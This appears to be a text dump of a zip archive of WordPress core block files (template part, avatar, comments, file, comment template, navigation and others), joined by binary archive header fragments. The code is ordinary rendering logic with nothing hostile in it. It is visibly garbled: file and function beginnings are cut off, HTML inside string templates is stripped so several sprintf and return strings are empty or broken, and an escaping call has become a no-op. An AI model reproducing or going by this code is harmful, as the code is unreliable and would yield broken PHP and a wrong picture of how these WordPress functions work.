5.9.0 * * @param string $template_part_id The requested template part namespaced to the theme. * @param array $attributes The block attributes. * @param string $template_part_file_path Absolute path to the not found template path. */ do_action( 'render_block_core_template_part_none', $template_part_id, $attributes, $template_part_file_path ); } } } // WP_DEBUG_DISPLAY must only be honored when WP_DEBUG. This precedent // is set in `wp_debug_mode()`. $is_debug = WP_DEBUG && WP_DEBUG_DISPLAY; if ( is_null( $content ) && $is_debug ) { if ( ! isset( $attributes['slug'] ) ) { // If there is no slug this is a placeholder and we dont want to return any message. return; } return sprintf( /* translators: %s: Template part slug. */ __( 'Template part has been deleted or is unavailable: %s' ), $attributes['slug'] ); } if ( isset( $seen_ids[ $template_part_id ] ) ) { return $is_debug ? // translators: Visible only in the front end, this warning takes the place of a faulty block. __( '[block rendering halted]' ) : ''; } // Look up area definition. $area_definition = null; $defined_areas = get_allowed_block_template_part_areas(); foreach ( $defined_areas as $defined_area ) { if ( $defined_area['area'] === $area ) { $area_definition = $defined_area; break; } } // If $area is not allowed, set it back to the uncategorized default. if ( ! $area_definition ) { $area = WP_TEMPLATE_PART_AREA_UNCATEGORIZED; } // Run through the actions that are typically taken on the_content. $content = shortcode_unautop( $content ); $content = do_shortcode( $content ); $seen_ids[ $template_part_id ] = true; $content = do_blocks( $content ); unset( $seen_ids[ $template_part_id ] ); $content = wptexturize( $content ); $content = convert_smilies( $content ); $content = wp_filter_content_tags( $content, "template_part_{$area}" ); // Handle embeds for block template parts. global $wp_embed; $content = $wp_embed->autoembed( $content ); if ( empty( $attributes['tagName'] ) || tag_escape( $attributes['tagName'] ) !== $attributes['tagName'] ) { $area_tag = 'div'; if ( $area_definition && isset( $area_definition['area_tag'] ) ) { $area_tag = $area_definition['area_tag']; } $html_tag = $area_tag; } else { $html_tag = esc_attr( $attributes['tagName'] ); } $wrapper_attributes = get_block_wrapper_attributes(); return "<$html_tag $wrapper_attributes>" . str_replace( ']]>', ']]>', $content ) . ""; } /** * Returns an array of area variation objects for the template part block. * * @param array $instance_variations The variations for instances. * * @return array Array containing the block variation objects. */ function build_template_part_block_area_variations( $instance_variations ) { $variations = array(); $defined_areas = get_allowed_block_template_part_areas(); foreach ( $defined_areas as $area ) { if ( 'uncategorized' !== $area['area'] ) { $has_instance_for_area = false; foreach ( $instance_variations as $variation ) { if ( $variation['attributes']['area'] === $area['area'] ) { $has_instance_for_area = true; break; } } $scope = $has_instance_for_area ? array() : array( 'inserter' ); $variations[] = array( 'name' => 'area_' . $area['area'], 'title' => $area['label'], 'description' => $area['description'], 'attributes' => array( 'area' => $area['area'], ), 'scope' => $scope, 'icon' => $area['icon'], ); } } return $variations; } /** * Returns an array of instance variation objects for the template part block * * @return array Array containing the block variation objects. */ function build_template_part_block_instance_variations() { // Block themes are unavailable during installation. if ( wp_installing() ) { return array(); } if ( ! current_theme_supports( 'block-templates' ) && ! current_theme_supports( 'block-template-parts' ) ) { return array(); } $variations = array(); $template_parts = get_block_templates( array( 'post_type' => 'wp_template_part', ), 'wp_template_part' ); $defined_areas = get_allowed_block_template_part_areas(); $icon_by_area = array_combine( array_column( $defined_areas, 'area' ), array_column( $defined_areas, 'icon' ) ); foreach ( $template_parts as $template_part ) { $variations[] = array( 'name' => 'instance_' . sanitize_title( $template_part->slug ), 'title' => $template_part->title, // If there's no description for the template part don't show the // block description. This is a bit hacky, but prevent the fallback // by using a non-breaking space so that the value of description // isn't falsey. 'description' => $template_part->description || ' ', 'attributes' => array( 'slug' => $template_part->slug, 'theme' => $template_part->theme, 'area' => $template_part->area, ), 'scope' => array( 'inserter' ), 'icon' => isset( $icon_by_area[ $template_part->area ] ) ? $icon_by_area[ $template_part->area ] : null, 'example' => array( 'attributes' => array( 'slug' => $template_part->slug, 'theme' => $template_part->theme, 'area' => $template_part->area, ), ), ); } return $variations; } /** * Returns an array of all template part block variations. * * @return array Array containing the block variation objects. */ function build_template_part_block_variations() { $instance_variations = build_template_part_block_instance_variations(); $area_variations = build_template_part_block_area_variations( $instance_variations ); return array_merge( $area_variations, $instance_variations ); } /** * Registers the `core/template-part` block on the server. */ function register_block_core_template_part() { register_block_type_from_metadata( __DIR__ . '/template-part', array( 'render_callback' => 'render_block_core_template_part', 'variations' => build_template_part_block_variations(), ) ); } add_action( 'init', 'register_block_core_template_part' ); PK7[0! post-author-biography.phpnu[context['postId'] ) ) { return ''; } $author_id = get_post_field( 'post_author', $block->context['postId'] ); if ( empty( $author_id ) ) { return ''; } $author_biography = get_the_author_meta( 'description', $author_id ); if ( empty( $author_biography ) ) { return ''; } $align_class_name = empty( $attributes['textAlign'] ) ? '' : "has-text-align-{$attributes['textAlign']}"; $wrapper_attributes = get_block_wrapper_attributes( array( 'class' => $align_class_name ) ); return sprintf( '
      ', $wrapper_attributes ) . $author_biography . '
      '; } /** * Registers the `core/post-author-biography` block on the server. */ function register_block_core_post_author_biography() { register_block_type_from_metadata( __DIR__ . '/post-author-biography', array( 'render_callback' => 'render_block_core_post_author_biography', ) ); } add_action( 'init', 'register_block_core_post_author_biography' ); PK7[&Zterm-description.phpnu[ implode( ' ', $classes ) ) ); return '
      ' . $term_description . '
      '; } /** * Registers the `core/term-description` block on the server. */ function register_block_core_term_description() { register_block_type_from_metadata( __DIR__ . '/term-description', array( 'render_callback' => 'render_block_core_term_description', ) ); } add_action( 'init', 'register_block_core_term_description' ); PK7['0 pattern.phpnu[ 'render_block_core_pattern', ) ); } /** * Renders the `core/pattern` block on the server. * * @since 6.3.0 Backwards compatibility: blocks with no `syncStatus` attribute do not receive block wrapper. * * @param array $attributes Block attributes. * * @return string Returns the output of the pattern. */ function render_block_core_pattern( $attributes ) { if ( empty( $attributes['slug'] ) ) { return ''; } $slug = $attributes['slug']; $registry = WP_Block_Patterns_Registry::get_instance(); if ( ! $registry->is_registered( $slug ) ) { return ''; } $pattern = $registry->get_registered( $slug ); $content = $pattern['content']; // Backward compatibility for handling Block Hooks and injecting the theme attribute in the Gutenberg plugin. // This can be removed when the minimum supported WordPress is >= 6.4. if ( defined( 'IS_GUTENBERG_PLUGIN' ) && IS_GUTENBERG_PLUGIN && ! function_exists( 'traverse_and_serialize_blocks' ) ) { $blocks = parse_blocks( $content ); $content = gutenberg_serialize_blocks( $blocks ); } return do_blocks( $content ); } add_action( 'init', 'register_block_core_pattern' ); PK7[~X heading.phpnu[Hello World * * Would be transformed to: *

      Hello World

      * * @param array $attributes Attributes of the block being rendered. * @param string $content Content of the block being rendered. * * @return string The content of the block being rendered. */ function block_core_heading_render( $attributes, $content ) { if ( ! $content ) { return $content; } $p = new WP_HTML_Tag_Processor( $content ); $header_tags = array( 'H1', 'H2', 'H3', 'H4', 'H5', 'H6' ); while ( $p->next_tag() ) { if ( in_array( $p->get_tag(), $header_tags, true ) ) { $p->add_class( 'wp-block-heading' ); break; } } return $p->get_updated_html(); } /** * Registers the `core/heading` block on server. */ function register_block_core_heading() { register_block_type_from_metadata( __DIR__ . '/heading', array( 'render_callback' => 'block_core_heading_render', ) ); } add_action( 'init', 'register_block_core_heading' ); PK7[3)   avatar.phpnu[context['commentId'] ) ) { $author_id = isset( $attributes['userId'] ) ? $attributes['userId'] : get_post_field( 'post_author', $block->context['postId'] ); $author_name = get_the_author_meta( 'display_name', $author_id ); // translators: %s is the Author name. $alt = sprintf( __( '%s Avatar' ), $author_name ); $avatar_block = get_avatar( $author_id, $size, '', $alt, array( 'extra_attr' => $image_styles, 'class' => $image_classes, ) ); if ( isset( $attributes['isLink'] ) && $attributes['isLink'] ) { $label = ''; if ( '_blank' === $attributes['linkTarget'] ) { // translators: %s is the Author name. $label = 'aria-label="' . esc_attr( sprintf( __( '(%s author archive, opens in a new tab)' ), $author_name ) ) . '"'; } // translators: %1$s: Author archive link. %2$s: Link target. %3$s Aria label. %4$s Avatar image. $avatar_block = sprintf( '%4$s', esc_url( get_author_posts_url( $author_id ) ), esc_attr( $attributes['linkTarget'] ), $label, $avatar_block ); } return sprintf( '
      %2s
      ', $wrapper_attributes, $avatar_block ); } $comment = get_comment( $block->context['commentId'] ); if ( ! $comment ) { return ''; } /* translators: %s is the Comment Author name */ $alt = sprintf( __( '%s Avatar' ), $comment->comment_author ); $avatar_block = get_avatar( $comment, $size, '', $alt, array( 'extra_attr' => $image_styles, 'class' => $image_classes, ) ); if ( isset( $attributes['isLink'] ) && $attributes['isLink'] && isset( $comment->comment_author_url ) && '' !== $comment->comment_author_url ) { $label = ''; if ( '_blank' === $attributes['linkTarget'] ) { // translators: %s is the Comment Author name. $label = 'aria-label="' . esc_attr( sprintf( __( '(%s website link, opens in a new tab)' ), $comment->comment_author ) ) . '"'; } // translators: %1$s: Comment Author website link. %2$s: Link target. %3$s Aria label. %4$s Avatar image. $avatar_block = sprintf( '%4$s', esc_url( $comment->comment_author_url ), esc_attr( $attributes['linkTarget'] ), $label, $avatar_block ); } return sprintf( '
      %2s
      ', $wrapper_attributes, $avatar_block ); } /** * Generates class names and styles to apply the border support styles for * the Avatar block. * * @param array $attributes The block attributes. * @return array The border-related classnames and styles for the block. */ function get_block_core_avatar_border_attributes( $attributes ) { $border_styles = array(); $sides = array( 'top', 'right', 'bottom', 'left' ); // Border radius. if ( isset( $attributes['style']['border']['radius'] ) ) { $border_styles['radius'] = $attributes['style']['border']['radius']; } // Border style. if ( isset( $attributes['style']['border']['style'] ) ) { $border_styles['style'] = $attributes['style']['border']['style']; } // Border width. if ( isset( $attributes['style']['border']['width'] ) ) { $border_styles['width'] = $attributes['style']['border']['width']; } // Border color. $preset_color = array_key_exists( 'borderColor', $attributes ) ? "var:preset|color|{$attributes['borderColor']}" : null; $custom_color = $attributes['style']['border']['color'] ?? null; $border_styles['color'] = $preset_color ? $preset_color : $custom_color; // Individual border styles e.g. top, left etc. foreach ( $sides as $side ) { $border = $attributes['style']['border'][ $side ] ?? null; $border_styles[ $side ] = array( 'color' => isset( $border['color'] ) ? $border['color'] : null, 'style' => isset( $border['style'] ) ? $border['style'] : null, 'width' => isset( $border['width'] ) ? $border['width'] : null, ); } $styles = wp_style_engine_get_styles( array( 'border' => $border_styles ) ); $attributes = array(); if ( ! empty( $styles['classnames'] ) ) { $attributes['class'] = $styles['classnames']; } if ( ! empty( $styles['css'] ) ) { $attributes['style'] = $styles['css']; } return $attributes; } /** * Registers the `core/avatar` block on the server. */ function register_block_core_avatar() { register_block_type_from_metadata( __DIR__ . '/avatar', array( 'render_callback' => 'render_block_core_avatar', ) ); } add_action( 'init', 'register_block_core_avatar' ); PK7[Rs comments.phpnu[context['postId']; if ( ! isset( $post_id ) ) { return ''; } // Return early if there are no comments and comments are closed. if ( ! comments_open( $post_id ) && (int) get_comments_number( $post_id ) === 0 ) { return ''; } // If this isn't the legacy block, we need to render the static version of this block. $is_legacy = 'core/post-comments' === $block->name || ! empty( $attributes['legacy'] ); if ( ! $is_legacy ) { return $block->render( array( 'dynamic' => false ) ); } $post_before = $post; $post = get_post( $post_id ); setup_postdata( $post ); ob_start(); /* * There's a deprecation warning generated by WP Core. * Ideally this deprecation is removed from Core. * In the meantime, this removes it from the output. */ add_filter( 'deprecated_file_trigger_error', '__return_false' ); comments_template(); remove_filter( 'deprecated_file_trigger_error', '__return_false' ); $output = ob_get_clean(); $post = $post_before; $classnames = array(); // Adds the old class name for styles' backwards compatibility. if ( isset( $attributes['legacy'] ) ) { $classnames[] = 'wp-block-post-comments'; } if ( isset( $attributes['textAlign'] ) ) { $classnames[] = 'has-text-align-' . $attributes['textAlign']; } $wrapper_attributes = get_block_wrapper_attributes( array( 'class' => implode( ' ', $classnames ) ) ); /* * Enqueues scripts and styles required only for the legacy version. That is * why they are not defined in `block.json`. */ wp_enqueue_script( 'comment-reply' ); enqueue_legacy_post_comments_block_styles( $block->name ); return sprintf( '
      %2$s
      ', $wrapper_attributes, $output ); } /** * Registers the `core/comments` block on the server. */ function register_block_core_comments() { register_block_type_from_metadata( __DIR__ . '/comments', array( 'render_callback' => 'render_block_core_comments', 'skip_inner_blocks' => true, ) ); } add_action( 'init', 'register_block_core_comments' ); /** * Use the button block classes for the form-submit button. * * @param array $fields The default comment form arguments. * * @return array Returns the modified fields. */ function comments_block_form_defaults( $fields ) { if ( wp_is_block_theme() ) { $fields['submit_button'] = ''; $fields['submit_field'] = '

      %1$s %2$s

      '; } return $fields; } add_filter( 'comment_form_defaults', 'comments_block_form_defaults' ); /** * Enqueues styles from the legacy `core/post-comments` block. These styles are * required only by the block's fallback. * * @param string $block_name Name of the new block type. */ function enqueue_legacy_post_comments_block_styles( $block_name ) { static $are_styles_enqueued = false; if ( ! $are_styles_enqueued ) { $handles = array( 'wp-block-post-comments', 'wp-block-buttons', 'wp-block-button', ); foreach ( $handles as $handle ) { wp_enqueue_block_style( $block_name, array( 'handle' => $handle ) ); } $are_styles_enqueued = true; } } /** * Ensures backwards compatibility for any users running the Gutenberg plugin * who have used Post Comments before it was merged into Comments Query Loop. * * The same approach was followed when core/query-loop was renamed to * core/post-template. * * @see https://github.com/WordPress/gutenberg/pull/41807 * @see https://github.com/WordPress/gutenberg/pull/32514 */ function register_legacy_post_comments_block() { $registry = WP_Block_Type_Registry::get_instance(); /* * Remove the old `post-comments` block if it was already registered, as it * is about to be replaced by the type defined below. */ if ( $registry->is_registered( 'core/post-comments' ) ) { unregister_block_type( 'core/post-comments' ); } // Recreate the legacy block metadata. $metadata = array( 'name' => 'core/post-comments', 'category' => 'theme', 'attributes' => array( 'textAlign' => array( 'type' => 'string', ), ), 'uses_context' => array( 'postId', 'postType', ), 'supports' => array( 'html' => false, 'align' => array( 'wide', 'full' ), 'typography' => array( 'fontSize' => true, 'lineHeight' => true, '__experimentalFontStyle' => true, '__experimentalFontWeight' => true, '__experimentalLetterSpacing' => true, '__experimentalTextTransform' => true, '__experimentalDefaultControls' => array( 'fontSize' => true, ), ), 'color' => array( 'gradients' => true, 'link' => true, '__experimentalDefaultControls' => array( 'background' => true, 'text' => true, ), ), 'inserter' => false, ), 'style' => array( 'wp-block-post-comments', 'wp-block-buttons', 'wp-block-button', ), 'render_callback' => 'render_block_core_comments', 'skip_inner_blocks' => true, ); /* * Filters the metadata object, the same way it's done inside * `register_block_type_from_metadata()`. This applies some default filters, * like `_wp_multiple_block_styles`, which is required in this case because * the block has multiple styles. */ /** This filter is documented in wp-includes/blocks.php */ $metadata = apply_filters( 'block_type_metadata', $metadata ); register_block_type( 'core/post-comments', $metadata ); } add_action( 'init', 'register_legacy_post_comments_block', 21 ); PK7[`T file.phpnu[block_type->view_script_handles; // If the script is not needed, and it is still in the `view_script_handles`, remove it. if ( ! $should_load_view_script && in_array( $view_js_file, $script_handles, true ) ) { $block->block_type->view_script_handles = array_diff( $script_handles, array( $view_js_file ) ); } // If the script is needed, but it was previously removed, add it again. if ( $should_load_view_script && ! in_array( $view_js_file, $script_handles, true ) ) { $block->block_type->view_script_handles = array_merge( $script_handles, array( $view_js_file ) ); } } // Update object's aria-label attribute if present in block HTML. // Match an aria-label attribute from an object tag. $pattern = '@aria-label="(?[^"]+)?")@i'; $content = preg_replace_callback( $pattern, static function ( $matches ) { $filename = ! empty( $matches['filename'] ) ? $matches['filename'] : ''; $has_filename = ! empty( $filename ) && 'PDF embed' !== $filename; $label = $has_filename ? sprintf( /* translators: %s: filename. */ __( 'Embed of %s.' ), $filename ) : __( 'PDF embed' ); return str_replace( $matches['attribute'], sprintf( 'aria-label="%s"', $label ), $matches[0] ); }, $content ); // If it uses the Interactivity API, add the directives. if ( $should_load_view_script ) { $processor = new WP_HTML_Tag_Processor( $content ); $processor->next_tag(); $processor->set_attribute( 'data-wp-interactive', '' ); $processor->next_tag( 'object' ); $processor->set_attribute( 'data-wp-bind--hidden', '!selectors.core.file.hasPdfPreview' ); $processor->set_attribute( 'hidden', true ); return $processor->get_updated_html(); } return $content; } /** * Ensure that the view script has the `wp-interactivity` dependency. * * @since 6.4.0 * * @global WP_Scripts $wp_scripts */ function block_core_file_ensure_interactivity_dependency() { global $wp_scripts; if ( isset( $wp_scripts->registered['wp-block-file-view'] ) && ! in_array( 'wp-interactivity', $wp_scripts->registered['wp-block-file-view']->deps, true ) ) { $wp_scripts->registered['wp-block-file-view']->deps[] = 'wp-interactivity'; } } add_action( 'wp_print_scripts', 'block_core_file_ensure_interactivity_dependency' ); /** * Registers the `core/file` block on server. */ function register_block_core_file() { register_block_type_from_metadata( __DIR__ . '/file', array( 'render_callback' => 'render_block_core_file', ) ); } add_action( 'init', 'register_block_core_file' ); PK7[vhhcomment-template.phpnu[comment_ID; $filter_block_context = static function ( $context ) use ( $comment_id ) { $context['commentId'] = $comment_id; return $context; }; /* * We set commentId context through the `render_block_context` filter so * that dynamically inserted blocks (at `render_block` filter stage) * will also receive that context. * * Use an early priority to so that other 'render_block_context' filters * have access to the values. */ add_filter( 'render_block_context', $filter_block_context, 1 ); /* * We construct a new WP_Block instance from the parsed block so that * it'll receive any changes made by the `render_block_data` filter. */ $block_content = ( new WP_Block( $block->parsed_block ) )->render( array( 'dynamic' => false ) ); remove_filter( 'render_block_context', $filter_block_context, 1 ); $children = $comment->get_children(); /* * We need to create the CSS classes BEFORE recursing into the children. * This is because comment_class() uses globals like `$comment_alt` * and `$comment_thread_alt` which are order-sensitive. * * The `false` parameter at the end means that we do NOT want the function * to `echo` the output but to return a string. * See https://developer.wordpress.org/reference/functions/comment_class/#parameters. */ $comment_classes = comment_class( '', $comment->comment_ID, $comment->comment_post_ID, false ); // If the comment has children, recurse to create the HTML for the nested // comments. if ( ! empty( $children ) && ! empty( $thread_comments ) ) { if ( $comment_depth < $thread_comments_depth ) { ++$comment_depth; $inner_content = block_core_comment_template_render_comments( $children, $block ); $block_content .= sprintf( '
        %1$s
      ', $inner_content ); --$comment_depth; } else { $block_content .= block_core_comment_template_render_comments( $children, $block ); } } $content .= sprintf( '
    9. %3$s
    10. ', $comment->comment_ID, $comment_classes, $block_content ); } return $content; } /** * Renders the `core/comment-template` block on the server. * * @param array $attributes Block attributes. * @param string $content Block default content. * @param WP_Block $block Block instance. * * @return string Returns the HTML representing the comments using the layout * defined by the block's inner blocks. */ function render_block_core_comment_template( $attributes, $content, $block ) { // Bail out early if the post ID is not set for some reason. if ( empty( $block->context['postId'] ) ) { return ''; } if ( post_password_required( $block->context['postId'] ) ) { return; } $comment_query = new WP_Comment_Query( build_comment_query_vars_from_block( $block ) ); // Get an array of comments for the current post. $comments = $comment_query->get_comments(); if ( count( $comments ) === 0 ) { return ''; } $comment_order = get_option( 'comment_order' ); if ( 'desc' === $comment_order ) { $comments = array_reverse( $comments ); } $wrapper_attributes = get_block_wrapper_attributes(); return sprintf( '
        %2$s
      ', $wrapper_attributes, block_core_comment_template_render_comments( $comments, $block ) ); } /** * Registers the `core/comment-template` block on the server. */ function register_block_core_comment_template() { register_block_type_from_metadata( __DIR__ . '/comment-template', array( 'render_callback' => 'render_block_core_comment_template', 'skip_inner_blocks' => true, ) ); } add_action( 'init', 'register_block_core_comment_template' ); PK7["<::navigation.phpnu[term_id, array( 'update_post_term_cache' => false ) ); _wp_menu_item_classes_by_context( $menu_items ); return $menu_items; } /** * Sorts a standard array of menu items into a nested structure keyed by the * id of the parent menu. * * @param array $menu_items Menu items to sort. * @return array An array keyed by the id of the parent menu where each element * is an array of menu items that belong to that parent. */ function block_core_navigation_sort_menu_items_by_parent_id( $menu_items ) { $sorted_menu_items = array(); foreach ( (array) $menu_items as $menu_item ) { $sorted_menu_items[ $menu_item->menu_order ] = $menu_item; } unset( $menu_items, $menu_item ); $menu_items_by_parent_id = array(); foreach ( $sorted_menu_items as $menu_item ) { $menu_items_by_parent_id[ $menu_item->menu_item_parent ][] = $menu_item; } return $menu_items_by_parent_id; } } /** * Add Interactivity API directives to the navigation-submenu and page-list * blocks markup using the Tag Processor. * * @param string $w Markup of the navigation block. * @param array $block_attributes Block attributes. * * @return string Submenu markup with the directives injected. */ function block_core_navigation_add_directives_to_submenu( $w, $block_attributes ) { while ( $w->next_tag( array( 'tag_name' => 'LI', 'class_name' => 'has-child', ) ) ) { // Add directives to the parent `
    11. `. $w->set_attribute( 'data-wp-interactive', true ); $w->set_attribute( 'data-wp-context', '{ "core": { "navigation": { "submenuOpenedBy": {}, "type": "submenu" } } }' ); $w->set_attribute( 'data-wp-effect', 'effects.core.navigation.initMenu' ); $w->set_attribute( 'data-wp-on--focusout', 'actions.core.navigation.handleMenuFocusout' ); $w->set_attribute( 'data-wp-on--keydown', 'actions.core.navigation.handleMenuKeydown' ); // This is a fix for Safari. Without it, Safari doesn't change the active // element when the user clicks on a button. It can be removed once we add // an overlay to capture the clicks, instead of relying on the focusout // event. $w->set_attribute( 'tabindex', '-1' ); if ( ! isset( $block_attributes['openSubmenusOnClick'] ) || false === $block_attributes['openSubmenusOnClick'] ) { $w->set_attribute( 'data-wp-on--mouseenter', 'actions.core.navigation.openMenuOnHover' ); $w->set_attribute( 'data-wp-on--mouseleave', 'actions.core.navigation.closeMenuOnHover' ); } // Add directives to the toggle submenu button. if ( $w->next_tag( array( 'tag_name' => 'BUTTON', 'class_name' => 'wp-block-navigation-submenu__toggle', ) ) ) { $w->set_attribute( 'data-wp-on--click', 'actions.core.navigation.toggleMenuOnClick' ); $w->set_attribute( 'data-wp-bind--aria-expanded', 'selectors.core.navigation.isMenuOpen' ); // The `aria-expanded` attribute for SSR is already added in the submenu block. } // Add directives to the submenu. if ( $w->next_tag( array( 'tag_name' => 'UL', 'class_name' => 'wp-block-navigation__submenu-container', ) ) ) { $w->set_attribute( 'data-wp-on--focus', 'actions.core.navigation.openMenuOnFocus' ); } // Iterate through subitems if exist. block_core_navigation_add_directives_to_submenu( $w, $block_attributes ); } return $w->get_updated_html(); } /** * Build an array with CSS classes and inline styles defining the colors * which will be applied to the navigation markup in the front-end. * * @param array $attributes Navigation block attributes. * * @return array Colors CSS classes and inline styles. */ function block_core_navigation_build_css_colors( $attributes ) { $colors = array( 'css_classes' => array(), 'inline_styles' => '', 'overlay_css_classes' => array(), 'overlay_inline_styles' => '', ); // Text color. $has_named_text_color = array_key_exists( 'textColor', $attributes ); $has_custom_text_color = array_key_exists( 'customTextColor', $attributes ); // If has text color. if ( $has_custom_text_color || $has_named_text_color ) { // Add has-text-color class. $colors['css_classes'][] = 'has-text-color'; } if ( $has_named_text_color ) { // Add the color class. $colors['css_classes'][] = sprintf( 'has-%s-color', $attributes['textColor'] ); } elseif ( $has_custom_text_color ) { // Add the custom color inline style. $colors['inline_styles'] .= sprintf( 'color: %s;', $attributes['customTextColor'] ); } // Background color. $has_named_background_color = array_key_exists( 'backgroundColor', $attributes ); $has_custom_background_color = array_key_exists( 'customBackgroundColor', $attributes ); // If has background color. if ( $has_custom_background_color || $has_named_background_color ) { // Add has-background class. $colors['css_classes'][] = 'has-background'; } if ( $has_named_background_color ) { // Add the background-color class. $colors['css_classes'][] = sprintf( 'has-%s-background-color', $attributes['backgroundColor'] ); } elseif ( $has_custom_background_color ) { // Add the custom background-color inline style. $colors['inline_styles'] .= sprintf( 'background-color: %s;', $attributes['customBackgroundColor'] ); } // Overlay text color. $has_named_overlay_text_color = array_key_exists( 'overlayTextColor', $attributes ); $has_custom_overlay_text_color = array_key_exists( 'customOverlayTextColor', $attributes ); // If has overlay text color. if ( $has_custom_overlay_text_color || $has_named_overlay_text_color ) { // Add has-text-color class. $colors['overlay_css_classes'][] = 'has-text-color'; } if ( $has_named_overlay_text_color ) { // Add the overlay color class. $colors['overlay_css_classes'][] = sprintf( 'has-%s-color', $attributes['overlayTextColor'] ); } elseif ( $has_custom_overlay_text_color ) { // Add the custom overlay color inline style. $colors['overlay_inline_styles'] .= sprintf( 'color: %s;', $attributes['customOverlayTextColor'] ); } // Overlay background color. $has_named_overlay_background_color = array_key_exists( 'overlayBackgroundColor', $attributes ); $has_custom_overlay_background_color = array_key_exists( 'customOverlayBackgroundColor', $attributes ); // If has overlay background color. if ( $has_custom_overlay_background_color || $has_named_overlay_background_color ) { // Add has-background class. $colors['overlay_css_classes'][] = 'has-background'; } if ( $has_named_overlay_background_color ) { // Add the overlay background-color class. $colors['overlay_css_classes'][] = sprintf( 'has-%s-background-color', $attributes['overlayBackgroundColor'] ); } elseif ( $has_custom_overlay_background_color ) { // Add the custom overlay background-color inline style. $colors['overlay_inline_styles'] .= sprintf( 'background-color: %s;', $attributes['customOverlayBackgroundColor'] ); } return $colors; } /** * Build an array with CSS classes and inline styles defining the font sizes * which will be applied to the navigation markup in the front-end. * * @param array $attributes Navigation block attributes. * * @return array Font size CSS classes and inline styles. */ function block_core_navigation_build_css_font_sizes( $attributes ) { // CSS classes. $font_sizes = array( 'css_classes' => array(), 'inline_styles' => '', ); $has_named_font_size = array_key_exists( 'fontSize', $attributes ); $has_custom_font_size = array_key_exists( 'customFontSize', $attributes ); if ( $has_named_font_size ) { // Add the font size class. $font_sizes['css_classes'][] = sprintf( 'has-%s-font-size', $attributes['fontSize'] ); } elseif ( $has_custom_font_size ) { // Add the custom font size inline style. $font_sizes['inline_styles'] = sprintf( 'font-size: %spx;', $attributes['customFontSize'] ); } return $font_sizes; } /** * Returns the top-level submenu SVG chevron icon. * * @return string */ function block_core_navigation_render_submenu_icon() { return ''; } /** * Filter out empty "null" blocks from the block list. * 'parse_blocks' includes a null block with '\n\n' as the content when * it encounters whitespace. This is not a bug but rather how the parser * is designed. * * @param array $parsed_blocks the parsed blocks to be normalized. * @return array the normalized parsed blocks. */ function block_core_navigation_filter_out_empty_blocks( $parsed_blocks ) { $filtered = array_filter( $parsed_blocks, static function ( $block ) { return isset( $block['blockName'] ); } ); // Reset keys. return array_values( $filtered ); } /** * Returns true if the navigation block contains a nested navigation block. * * @param WP_Block_List $inner_blocks Inner block instance to be normalized. * @return bool true if the navigation block contains a nested navigation block. */ function block_core_navigation_block_contains_core_navigation( $inner_blocks ) { foreach ( $inner_blocks as $block ) { if ( 'core/navigation' === $block->name ) { return true; } if ( $block->inner_blocks && block_core_navigation_block_contains_core_navigation( $block->inner_blocks ) ) { return true; } } return false; } /** * Retrieves the appropriate fallback to be used on the front of the * site when there is no menu assigned to the Nav block. * * This aims to mirror how the fallback mechanic for wp_nav_menu works. * See https://developer.wordpress.org/reference/functions/wp_nav_menu/#more-information. * * @return array the array of blocks to be used as a fallback. */ function block_core_navigation_get_fallback_blocks() { $page_list_fallback = array( array( 'blockName' => 'core/page-list', ), ); $registry = WP_Block_Type_Registry::get_instance(); // If `core/page-list` is not registered then return empty blocks. $fallback_blocks = $registry->is_registered( 'core/page-list' ) ? $page_list_fallback : array(); if ( class_exists( 'WP_Navigation_Fallback' ) ) { $navigation_post = WP_Navigation_Fallback::get_fallback(); } else { $navigation_post = Gutenberg_Navigation_Fallback::get_fallback(); } // Use the first non-empty Navigation as fallback if available. if ( $navigation_post ) { $parsed_blocks = parse_blocks( $navigation_post->post_content ); $maybe_fallback = block_core_navigation_filter_out_empty_blocks( $parsed_blocks ); // Normalizing blocks may result in an empty array of blocks if they were all `null` blocks. // In this case default to the (Page List) fallback. $fallback_blocks = ! empty( $maybe_fallback ) ? $maybe_fallback : $fallback_blocks; } /** * Filters the fallback experience for the Navigation block. * * Returning a falsey value will opt out of the fallback and cause the block not to render. * To customise the blocks provided return an array of blocks - these should be valid * children of the `core/navigation` block. * * @since 5.9.0 * * @param array[] default fallback blocks provided by the default block mechanic. */ return apply_filters( 'block_core_navigation_render_fallback', $fallback_blocks ); } /** * Iterate through all inner blocks recursively and get navigation link block's post IDs. * * @param WP_Block_List $inner_blocks Block list class instance. * * @return array Array of post IDs. */ function block_core_navigation_get_post_ids( $inner_blocks ) { $post_ids = array_map( 'block_core_navigation_from_block_get_post_ids', iterator_to_array( $inner_blocks ) ); return array_unique( array_merge( ...$post_ids ) ); } /** * Get post IDs from a navigation link block instance. * * @param WP_Block $block Instance of a block. * * @return array Array of post IDs. */ function block_core_navigation_from_block_get_post_ids( $block ) { $post_ids = array(); if ( $block->inner_blocks ) { $post_ids = block_core_navigation_get_post_ids( $block->inner_blocks ); } if ( 'core/navigation-link' === $block->name || 'core/navigation-submenu' === $block->name ) { if ( $block->attributes && isset( $block->attributes['kind'] ) && 'post-type' === $block->attributes['kind'] && isset( $block->attributes['id'] ) ) { $post_ids[] = $block->attributes['id']; } } return $post_ids; } /** * Renders the `core/navigation` block on server. * * @param array $attributes The block attributes. * @param string $content The saved content. * @param WP_Block $block The parsed block. * * @return string Returns the post content with the legacy widget added. */ function render_block_core_navigation( $attributes, $content, $block ) { static $seen_menu_names = array(); // Flag used to indicate whether the rendered output is considered to be // a fallback (i.e. the block has no menu associated with it). $is_fallback = false; $nav_menu_name = $attributes['ariaLabel'] ?? ''; /** * Deprecated: * The rgbTextColor and rgbBackgroundColor attributes * have been deprecated in favor of * customTextColor and customBackgroundColor ones. * Move the values from old attrs to the new ones. */ if ( isset( $attributes['rgbTextColor'] ) && empty( $attributes['textColor'] ) ) { $attributes['customTextColor'] = $attributes['rgbTextColor']; } if ( isset( $attributes['rgbBackgroundColor'] ) && empty( $attributes['backgroundColor'] ) ) { $attributes['customBackgroundColor'] = $attributes['rgbBackgroundColor']; } unset( $attributes['rgbTextColor'], $attributes['rgbBackgroundColor'] ); /** * This is for backwards compatibility after `isResponsive` attribute has been removed. */ $has_old_responsive_attribute = ! empty( $attributes['isResponsive'] ) && $attributes['isResponsive']; $is_responsive_menu = isset( $attributes['overlayMenu'] ) && 'never' !== $attributes['overlayMenu'] || $has_old_responsive_attribute; $inner_blocks = $block->inner_blocks; // Ensure that blocks saved with the legacy ref attribute name (navigationMenuId) continue to render. if ( array_key_exists( 'navigationMenuId', $attributes ) ) { $attributes['ref'] = $attributes['navigationMenuId']; } // If: // - the gutenberg plugin is active // - `__unstableLocation` is defined // - we have menu items at the defined location // - we don't have a relationship to a 